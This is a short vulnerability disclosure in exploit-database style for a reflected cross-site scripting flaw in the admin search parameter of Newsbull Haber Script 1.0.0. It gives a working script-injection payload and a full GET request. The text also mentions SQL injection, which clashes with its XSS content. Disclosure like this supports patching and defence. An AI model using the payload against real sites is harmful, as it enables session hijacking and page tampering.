####################################################################

# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

####################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# You can see the vulnerability by using the XSS code as specified in the poc section.
# The proof of the deficit is in the link below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg

####################################################################

# POC - XSS
# Parameters : search
# Attack Pattern : ’--></style></scRipt><scRipt>alert(0x007454)</scRipt>
# GET Request : http://localhost/newsbull/admin/category/records?search=’--></style></scRipt><scRipt>alert(0x007454)</scRipt>

####################################################################